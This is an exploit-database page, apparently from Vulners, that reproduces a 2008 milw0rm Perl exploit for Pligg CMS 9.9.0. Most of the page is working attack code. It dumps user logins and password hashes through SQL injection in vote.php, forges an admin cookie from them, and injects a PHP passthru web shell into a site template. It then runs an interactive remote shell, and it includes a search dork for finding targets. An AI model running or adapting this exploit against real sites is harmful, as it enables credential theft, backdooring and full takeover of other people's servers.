Vulners
Lucene search
Pligg CMS 9.9.0 - Remote Code Execution
#!/usr/bin/perl -w
use LWP::UserAgent;
use MIME::Base64;
use Digest::MD5 qw(md5_hex);
use Getopt::Std; getopts('h:', \%args);
print "#############################################\n";
print "# Pligg <= 9.9 Remote Code Execution Exploit \n";
print "#############################################\n";
#dork = "Powered By Pligg" + "Legal: License and Source"
# Proxy address
$ENV{http_proxy} = 'http://127.0.0.1:8118/';
my $http = LWP::UserAgent->new;
$http->agent('Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.9.0.1) Gecko/2008070208 Firefox/3.0.1');
#$http->env_proxy(); # <-- uncomment for proxy
$http->cookie_jar({});
my $host = $args{'h'} || usage(); # Host flag. Specify the Pligg root directory
my $user = undef;
my $pass = undef;
my $file = undef;
my $data = undef;
my @auth = undef;
# Details for the php code that is injected in to the template
my $ereg = '<cmdout>(.*?)<\/cmdout>';
my $cvar = 'cmd';
my $cval = 'pwd;id';
my $code = '<cmdout><?php if ( !empty($_REQUEST["' . $cvar . '"]) ) passthru($_REQUEST["' . $cvar . '"]); ?></cmdout>';
print "[*] Checking if a shell already exists ...\n";
$data = $http->post(
$host . '/index.php',
[
$cvar => $cval
]);
if ( $data->content =~ /$ereg/si )
{
print "[*] Found existing shell ...\n";
}
else
{
print "[!] No existing shell found ...\n";
#############################################
# Gather user info via vote.php SQL Injection
#############################################
$data = $http->post(
$host . '/vote.php',
[
'id' => '-99 UNION SELECT 1,2,3,null,5,6,concat(user_login,char(58),user_pass),8,9 FROM pligg_users -- /*',
'md5' => 'd41d8cd98f00b204e9800998ecf8427e' # <-- If you aren't logged in this always works
]);
print "[*] Gathering user information ...\n";
if ( $data->content =~ /(.*?):([a-f0-9]{1,64})/i )
{
$user = $1;
$pass = $2;
# Sets up the cookie to authenticate us
@auth = ('Cookie' => 'mnm_user=' . $user . '; mnm_key=' . encode_base64($user . ':' . crypt($user, 22) . ':' . md5_hex($pass)) . ';');
print "[+] Got user '$user' ...\n";
}
else
{
print "[!] Unable to get user info. Dumping output ...\n";
open(ELOG, '>pligg_debug.html');print ELOG $data->content;close(ELOG);
exit;
}
#############################################
# Get the template path
#############################################
print "[*] Gathering template information ...\n";
$data = $http->get($host . '/admin_editor.php',@auth);
if ( $data->content =~ />(.*?)<\/option>/i )
{
$file = $1;
# Quick and dirty fix
$file =~ s/admin_templates\/admin_access_denied.tpl/footer.tpl/;
print "[+] Got template file [$file]...\n";
}
#############################################
# Read the template contents
#############################################
$data = $http->post(
$host . '/admin_editor.php',
[
'the_file' => $file,
'open' => 'Open'
]
,@auth);
print "[*] Reading template data ...\n";
# Grab the template contents
if ( $data->content =~ /<textarea(.*)>(.*)<\/textarea>/is )
{
$temp = $2;
$temp =~ s/>/>/ig;
$temp =~ s/</</ig;
$temp =~ s/"/"/ig;
$temp =~ s/&/&/ig;
print "[+] Got template data ...\n";
}
else
{
print "[!] Unable to get template data. Dumping output ...\n";
open(ELOG, '>pligg_debug.html');print ELOG $data->content;close(ELOG);
exit;
}
#############################################
# Update the Template Contents
#############################################
$data = $http->post(
$host . '/admin_editor.php',
[
'the_file2' => $file,
'updatedfile' => $temp . $code,
'save' => 'Save+Changes'
]
,@auth);
print "[*] Updating template data ...\n";
if ( $data->content =~ /File Saved/is )
{
print "[+] File saved!\n";
}
else
{
print "[!] Unable to update template data. Dumping output ...\n";
open(ELOG, '>pligg_debug.html');print ELOG $data->content;close(ELOG);
exit;
}
}
#############################################
# Setting up the php shell
#############################################
print "[*] Setting up shell ...\n";
$data = $http->post(
$host . '/index.php',
[
$cvar => $cval
]);
if ( $data->content =~ /<cmdout>(.*?)<\/cmdout>/si )
{
while ( 1 )
{
print "pligg:~#";
$exec = <STDIN>;
$data = $http->post(
$host . '/index.php',
[
$cvar => $exec
]);
if ( $data->content =~ /$ereg/si )
{
print $1 . "\n";
}
else
{
print "Unexpected Response!\n";
}
}
}
else
{
print "[!] Unable to set up shell ...\n";
open(ELOG, '>pligg_debug.html');print ELOG $data->content;close(ELOG);
exit;
}
sub usage
{
print "pligg_exploit.pl -h http://path/to/pligg \n";
exit;
}
# milw0rm.com [2008-07-30]Data
Build on a solid foundation with Vulners data
We provide the essential building blocks for cybersecurity solutions with comprehensive, structured, and constantly updated vulnerability and exploits data
Api
Power your application with Vulners API
The Vulners REST API offers reliable, high-performance access to vulnerability intelligence, with 99.9% SLA uptime and CDN-backed data delivery for seamless global access
App
Assess and manage vulnerabilities with Vulners tools
Built on top of Vulners' database and SDK, end-user solutions give security professionals and developers lightweight and powerful tools for vulnerability remediation
30 Jul 2008 00:00Current
7.4High risk
Vulners AI Score7.4